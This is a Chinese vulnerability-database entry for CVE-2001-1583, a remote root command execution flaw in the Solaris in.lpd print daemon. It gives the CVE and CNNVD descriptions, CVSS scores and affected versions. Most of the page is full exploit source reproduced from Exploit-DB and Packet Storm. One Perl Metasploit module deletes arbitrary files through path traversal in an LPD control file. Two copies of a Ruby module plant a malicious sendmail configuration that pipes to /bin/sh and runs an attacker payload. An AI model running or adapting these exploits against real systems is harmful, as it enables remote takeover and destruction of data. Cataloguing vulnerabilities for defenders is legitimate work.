CVE-2001-1583
CVSS10.0
发布时间 :2001-12-31 00:00:00
修订时间 :2010-06-24 00:00:00
NMCOEP    

[原文]lpd daemon (in.lpd) in Solaris 8 and earlier allows remote attackers to execute arbitrary commands via a job request with a crafted control file that is not properly handled when lpd invokes a mail program. NOTE: this might be the same vulnerability as CVE-2000-1220.


[CNNVD]Solaris lpd远程执行任意命令漏洞(CNNVD-200112-257)

        
        Solaris所带的打印服务程序in.lpd提供系统的打印服务。
        Solaris的in.lpd存在一个安全问题,允许远程攻击者以超级用户权限在服务器上执行任意命令。
        攻击者可以通过发送特定格式的配置文件和数据文件给打印服务程序,当lpd调用mail/sendmail来发送邮件时,将执行攻击者指定的任意命令。
        这个漏洞与NAI发布的安全公告NAI-0020中所描述的漏洞非常类似。
        据报告攻击者不需要受害主机上存在一个台有效的打印机即可进行攻击。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.0
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:2.2
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:8.0:unkown:x86
cpe:/o:sun:solaris:2.5.1
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/o:sun:solaris:2.5.1::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1583
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1583
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-257
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/7087
(UNKNOWN)  XF  solaris-lpd-sendmail-commands(7087)
http://www.securityfocus.com/bid/3274
(UNKNOWN)  BID  3274
http://www.osvdb.org/15131
(UNKNOWN)  OSVDB  15131
http://www.derkeiler.com/Mailing-Lists/securityfocus/incidents/2001-08/0490.html
(UNKNOWN)  SF-INCIDENTS  20010829 solaris lpd, KARMAPOLICE?
http://metasploit.com/projects/Framework/modules/exploits/solaris_lpd_exec.pm
(UNKNOWN)  MISC  http://metasploit.com/projects/Framework/modules/exploits/solaris_lpd_exec.pm
http://marc.info/?l=bugtraq&m=99929694701826&w=2
(UNKNOWN)  BUGTRAQ  20010831 Solaris LPD Exploit (fwd)

- 漏洞信息

Solaris lpd远程执行任意命令漏洞
危急 环境条件错误
2001-12-31 00:00:00 2007-10-03 00:00:00
远程  
        
        Solaris所带的打印服务程序in.lpd提供系统的打印服务。
        Solaris的in.lpd存在一个安全问题,允许远程攻击者以超级用户权限在服务器上执行任意命令。
        攻击者可以通过发送特定格式的配置文件和数据文件给打印服务程序,当lpd调用mail/sendmail来发送邮件时,将执行攻击者指定的任意命令。
        这个漏洞与NAI发布的安全公告NAI-0020中所描述的漏洞非常类似。
        据报告攻击者不需要受害主机上存在一个台有效的打印机即可进行攻击。
        

- 公告与补丁

        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://sunsolve.sun.com/security

- 漏洞信息 (1167)

Solaris <= 10 LPD Arbitrary File Delete Exploit (metasploit) (EDBID:1167)
solaris remote
2005-08-19 Verified
0 Optyx
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::solaris_lpd_unlink;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'		=> 'Solaris LPD Arbitrary File Delete',
	'Version'	=> '$Revision: 1.6 $',
	'Authors'	=>
	  [
		'H D Moore <hdm [at] metasploit.com>',
		'Optyx <optyx [at] uberhax0r.net>'
	  ],

	'Arch'		=> [ ],
	'OS'		=> [ 'solaris' ],

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The LPD server port', 515],
		'RPATH' => [1, 'DATA', 'The remote path name to delete'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module uses a vulnerability in the Solaris line printer daemon
	to delete arbitrary files on an affected system. This can be used to exploit
	the rpc.walld format string flaw, the missing krb5.conf authentication bypass,
	or simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. 
}),

	'Refs'  =>
	  [
		['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
	  ],

	'DefaultTarget' => 0,
	'Targets' => [['No Target Needed']],

	'Keys'  => ['lpd'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_path = $self->GetVar('RPATH');
	my $res;

	# We use one connection to configure the spool directory
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Send a job request that will trigger the cascade adaptor (thanks Dino!)
	$s->Send("\x02"."metasploit:framework\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our job request command");
		return;
	}

	# The job ID is squashed down to three decimal digits
	my $jid = ($$ % 1000).unpack("H*",pack('N', time() + $$));

	# Create a simple control file...
	my $control = "Hmetasploit\nPr00t\n";

	# Theoretically, we could delete multiple files at once, however
	# the lp daemon will append garbage from memory to the path name
	# if we don't stick a null byte after the path. Unfortunately, this
	# null byte will prevent the parser from processing the other paths.
	$control .= "U".("../" x 10)."$target_path\x00\n";

	my $dataf = "http://metasploit.com/\n";

	$self->PrintLine("[*] Sending the malicious cascaded job request...");
	if ( ! $self->SendFile($s, 2, "cfA".$jid."metasploit", $control) ||
		! $self->SendFile($s, 3, "dfa".$jid."metasploit", $dataf)  ||
		0
	  ) { $s->Close; return }

	$self->PrintLine('');
	$self->PrintLine("[*] Successfully deleted $target_path >:-]");
	return;
}

sub SendFile {
	my $self = shift;
	my $sock = shift;
	my $type = shift;
	my $name = shift;
	my $data = shift;

	$sock->Send(chr($type) .length($data). " $name\n");
	my $res = $sock->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file command ($name)");
		return;
	}

	$sock->Send($data);
	$sock->Send("\x00");
	$res = $sock->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file data ($name)");
		return;
	}

	$self->PrintLine(sprintf("[*]     Uploaded %.4d bytes >> $name", length($data)));
	return 1;
}

1;

# milw0rm.com [2005-08-19]
		

- 漏洞信息 (16322)

Solaris LPD Command Execution (EDBID:16322)
solaris remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: sendmail_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],
				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"

		# The job ID is squashed down to three decimal digits
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"


		# The mail configuration file
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"

		# Establish the first connection to the server
		sock1 = connect(false)

		# Request a cascaded job
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			print_status("The target did not accept our job request command")
			return
		end

		print_status("Configuring the spool directory...")
		if !(
				send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock1, 3, jid + "mail.cf", mailcf) and
				send_file(sock1, 3, jid + "script", payload.encoded)
			)
			sock1.close
			return
		end

		# Establish the second connection to the server
		sock2 = connect(false)

		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			print_status("The target did not accept our second job request command")
			return
		end

		print_status("Attempting to trigger the vulnerable call to the mail program...")
		if !(
				send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
				send_file(sock2, 3, "dfa" + jid + "config", mailcf)
			)
			sock1.close
			sock2.close
			return
		end

		sock1.close
		sock2.close

		print_status("Waiting up to 60 seconds for the payload to execute...")
		select(nil,nil,nil,60)

		handler
	end

	def send_file(s, type, name, data='')

		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file command (#{name})")
			return
		end

		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0,1] == "\x00")
			print_status("The target did not accept our control file data (#{name})")
			return
		end

		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end

		

- 漏洞信息 (21097)

Solaris 2.x/7.0/8 lpd Remote Command Execution Vulnerability (EDBID:21097)
solaris remote
2001-08-31 Verified
0 ron1n
N/A [点击下载]
source: http://www.securityfocus.com/bid/3274/info

The print protocol daemon, 'in.lpd' (or 'lpd'), shipped with Solaris may allow for remote attackers to execute arbitrary commands on target hosts with superuser privileges.

The alleged vulnerability is not the buffer overflow discovered by ISS.

It has been reported that it is possible to execute commands on target hosts through lpd by manipulating the use of sendmail by the daemon.

If this vulnerability is successfully exploited, remote attackers can execute any command on the target host with superuser privileges.

This vulnerability is very similar to one mentioned in NAI advisory NAI-0020.

NOTE: It has been reported that a valid printer does NOT need to be configured to exploit this vulnerability.

http://www.exploit-db.com/sploits/21097.tar.gz		

- 漏洞信息 (F82322)

Solaris LPD Command Execution (PacketStormID:F82322)
2009-10-28 00:00:00
H D Moore,Dino A. Dai Zovi  metasploit.com
exploit,arbitrary
solaris
CVE-2001-1583
[点击下载]

This Metasploit module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris LPD Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Sun Solaris
				up to and including 8.0. This module uses a technique
				discovered by Dino Dai Zovi to exploit the flaw without
				needing to know the resolved name of the attacking system.
					
			},
			'Author'         => [ 'hdm', 'ddz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-1583'],
					[ 'OSVDB', '15131'],
					[ 'BID', '3274'],

				],
			'Platform'       => ['unix', 'solaris'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 8192,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},	
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Aug 31 2001',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def exploit

		# This is the temporary path created in the spool directory
		spath = "/var/spool/print"
		
		# The job ID is squashed down to three decimal digits
		jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

		# The control file
		control =
			"H"+"metasploit\n"+
			"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
			"f"+"dfA"+jid+"config\n"+
			"f"+"dfA"+jid+"script\n"
	  		

		# The mail configuration file
		mailcf =
			"V8\n"+
			"\n"+
			"Ou0\n"+
			"Og0\n"+
			"OL0\n"+
			"Oeq\n"+
			"OQX/tmp\n"+
			"\n"+
			"FX|/bin/sh #{spath}/#{jid}script\n"+
			"\n"+
			"S3\n"+
			"S0\n"+
			"R\+     #local \\@blah :blah\n"+
			"S1\n"+
			"S2\n"+
			"S4\n"+
			"S5\n"+
			"\n"+
			"Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
			"Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
			
		# Establish the first connection to the server
		sock1 = connect(false)
		
		# Request a cascaded job
		sock1.put("\x02metasploit:framework\n")
		res = sock1.get_once
		if (not res)
			print_status("The target did not accept our job request command")
			return
		end
		
		print_status("Configuring the spool directory...")
		if !(
			send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
			send_file(sock1, 3, jid + "mail.cf", mailcf) and
			send_file(sock1, 3, jid + "script", payload.encoded)
		   )
		   	sock1.close
			return
		end
			
		# Establish the second connection to the server
		sock2 = connect(false)
		
		# Request another cascaded job
		sock2.put("\x02localhost:metasploit\n")
		res = sock2.get_once
		if (not res)
			print_status("The target did not accept our second job request command")
			return
		end		
		
		print_status("Triggering the vulnerable call to the mail program...")
		if !(
			send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
			send_file(sock2, 3, "dfa" + jid + "config", mailcf)
		   )
		   	sock1.close
			sock2.close
			return
		end		
	
		sock1.close
		sock2.close
			
		print_status("Waiting up to 60 seconds for the payload to execute...")
		sleep(60)
		
		handler
	end

	def send_file(s, type, name, data='')
		
		s.put(type.chr + data.length.to_s + " " + name + "\n")
		res = s.get_once(1)
		if !(res and res[0] == ?\0)
			print_status("The target did not accept our control file command (#{name})")
			return
		end
		
		s.put(data)
		s.put("\x00")
		res = s.get_once(1)
		if !(res and res[0] == ?\0)
			print_status("The target did not accept our control file data (#{name})")
			return
		end	
		
		print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
		return true
	end

end

    

- 漏洞信息

15131
Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

Solaris contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered when a specially crafted request is sent to the LPD daemon. It is possible that the flaw may allow arbitrary command execution resulting in a loss of integrity.

- 时间线

2001-08-31 Unknow
2001-08-31 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站